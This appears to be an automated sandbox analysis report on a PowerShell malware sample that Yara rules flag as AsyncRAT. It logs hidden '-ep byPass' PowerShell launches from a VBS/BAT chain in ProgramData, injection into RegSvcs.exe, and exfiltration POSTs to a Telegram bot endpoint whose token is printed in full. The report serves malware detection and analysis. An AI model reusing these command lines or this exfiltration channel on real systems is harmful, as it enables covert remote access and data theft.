          Source: global trafficHTTP traffic detected: POST /bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 63Connection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /?format=text HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: api.ipify.orgConnection: Keep-Alive
          Source: global trafficDNS traffic detected: DNS query: api.ipify.org
          Source: global trafficDNS traffic detected: DNS query: api.telegram.org
          Source: global trafficDNS traffic detected: DNS query: vecotr.viewdns.net
          Source: unknownHTTP traffic detected: POST /bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessage HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/x-www-form-urlencodedHost: api.telegram.orgContent-Length: 63Connection: Keep-Alive
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4C94A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4CA23000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.telegram.org
          Source: powershell.exe, 00000001.00000002.1613322253.0000026A5B7F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1613322253.0000026A5BA76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4B781000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 0000000B.00000002.3868513529.0000000002771000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
          Source: powershell.exe, 00000001.00000002.1625284459.0000026A63A20000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4B781000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4D424000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1567596454.0000026A4D3FE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4C862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4C862000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.ipify.org/?format=text
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4C862000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1613322253.0000026A5B7F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmp, LUYYSwStKN.ps1String found in binary or memory: https://api.ipify.org?format=text
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4C98C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
          Source: powershell.exe, 00000001.00000002.1613322253.0000026A5B7F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmp, LUYYSwStKN.ps1String found in binary or memory: https://api.telegram.org/bot$BotToken/sendMessage
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4CA23000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1567596454.0000026A4C98C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessage
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4C98C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot7023733342:AAF7anpSpW-b4P0f9IHAtSRpneaxwA7w_Lc/sendMessagep
          Source: powershell.exe, 00000001.00000002.1613322253.0000026A5BA76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
          Source: powershell.exe, 00000001.00000002.1613322253.0000026A5BA76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
          Source: powershell.exe, 00000001.00000002.1613322253.0000026A5BA76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4B938000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
          Source: powershell.exe, 00000001.00000002.1567596454.0000026A4D778000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
          Source: powershell.exe, 00000001.00000002.1613322253.0000026A5B7F0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1613322253.0000026A5BA76000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
          Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
          Source: unknownHTTPS traffic detected: 104.26.12.205:443 -> 192.168.2.8:49705 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49706 version: TLS 1.2

          System Summary

          barindex
          Malicious sample detected (through community Yara rule)
          Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
          Source: 0000000B.00000002.3865121018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
          Windows Scripting host queries suspicious COM object (likely to drop second stage)
          Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
          Wscript starts Powershell (via cmd or directly)
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess Stats: CPU usage > 49%
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AE342DA1_2_00007FFB4AE342DA
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AE314381_2_00007FFB4AE31438
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AE309F21_2_00007FFB4AE309F2
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AEF26F91_2_00007FFB4AEF26F9
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AEF34621_2_00007FFB4AEF3462
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AEF341A1_2_00007FFB4AEF341A
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00CFB03811_2_00CFB038
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00CF635011_2_00CF6350
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00CF567811_2_00CF5678
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00CF2BE811_2_00CF2BE8
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00CF533011_2_00CF5330
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00CF84D011_2_00CF84D0
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 11_2_00CF0BA011_2_00CF0BA0
          Source: 11.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: 0000000B.00000002.3865121018.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
          Source: classification engineClassification label: mal100.troj.expl.evad.winPS1@13/12@3/3
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7784:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7440:120:WilError_03
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: \Sessions\1\BaseNamedObjects\N5Yy5TM3WOXfdPYN
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ortsuiw1.iv2.ps1Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Users\desktop.iniJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
          Source: LUYYSwStKN.ps1ReversingLabs: Detection: 18%
          Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\LUYYSwStKN.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\ProgramData\Music\Visuals\VsLabs.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Music\Visuals\VsEnhance.bat" "Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe cmd /c Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: linkinfo.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntshrui.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cscapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: policymanager.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msvcp110_win.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: taskflowdataengine.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cdp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: umpdc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dsreg.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior

          Data Obfuscation

          barindex
          Suspicious powershell command line found
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1"
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Powershell -noP -W hidden -ep byPass -NONI "C:\ProgramData\Music\Visuals\VsLabsData.ps1" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AD0D2A5 pushad ; iretd 1_2_00007FFB4AD0D2A6
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AE37C5E push eax; retf 1_2_00007FFB4AE37C6D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AE37C2E pushad ; retf 1_2_00007FFB4AE37C5D
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AE28148 push ebx; ret 1_2_00007FFB4AE2816A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AE278FB push ebx; retf 1_2_00007FFB4AE2796A
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_00007FFB4AE2BA0D push ebx; iretd 1_2_00007FFB4AE2BA1A
